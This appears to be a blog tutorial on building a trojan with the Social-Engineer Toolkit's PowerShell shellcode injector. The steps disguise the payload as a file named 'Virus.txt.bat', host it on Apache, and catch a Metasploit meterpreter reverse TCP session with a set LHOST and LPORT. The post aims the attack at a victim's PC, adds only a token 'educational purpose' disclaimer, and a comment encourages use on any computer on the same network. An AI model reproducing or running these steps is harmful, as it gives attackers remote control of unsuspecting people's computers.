Headlines
Loading...
Make virus (trojan) | Hacks victim's PC | Hack by sending virus file.

Make virus (trojan) | Hacks victim's PC | Hack by sending virus file.

Make virus (trojan), Hacks victim's PC, Hack by sending virus file.
Make Virus
This is not for any bad purpose. I made it only for educational purpose. Don't use it for bad purpose.

First of all, you need to open your Kali Linux. After opening it, open your Kali Linux terminal.
After opening it, type
setoolkit
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

After clicking Enter. A new option appears.
You need to type
y
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

After hitting Enter. A new screen with some options appears.
Type
1
That is (Social Engineering Attacks)
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

After hitting Enter. A new screen with some options appears.
Type
9
That is (Powershell Attack Vectors)
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

After hitting Enter. A new screen with some options appears.
Type
1
That is (Powershell Alphanumeric Shellcode Injector)
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

Then, you need to type
IP Address, Port
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

When you write the IP Address and Port, it will automatically generate a payload.
Open Home Screen. If it will not show the the folder named as .set. You need to tick the Show Hidden Options
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

Open it by clicking on .set option. Then click Reports option. And then click on Powershell.
After this,click this highlighted option.
Copy it from here and paste it here Computer/var/www/html.
Right click on it and Rename it.
I give it a name Virus.txt.bat
You can give it any name as you wish, but (.txt.bat) extension does not change.
After that, open your terminal again.
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.Make virus (trojan), Hacks victim's PC, Hack by sending virus file.
Then, there is an option to start listener 
type
Yes
After it, open a new terminal
Run
service apache2 start
service postgresql start
Then type
 msfconsole
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

After opening it
type
use exploit/multi/handler
After that, type
set payload windows/meterpreter/reverse_tcp
Then, type
set LHOST 192.168.182.133
After it, type
set LPORT 4444
And then, type
exploit
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

 When someone download it and run it as administrator then the meterpreter session start.
You can type command Help
It will show all the commands that we use with the connected device.
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

I am a command by using that command name.
type
sysinfo
Make virus (trojan), Hacks victim's PC, Hack by sending virus file.

1 comment

  1. I hope you will enjoying after using it. You can connect with any computer or laptop that is connected with the same network.

    ReplyDelete

Thanks for your comment.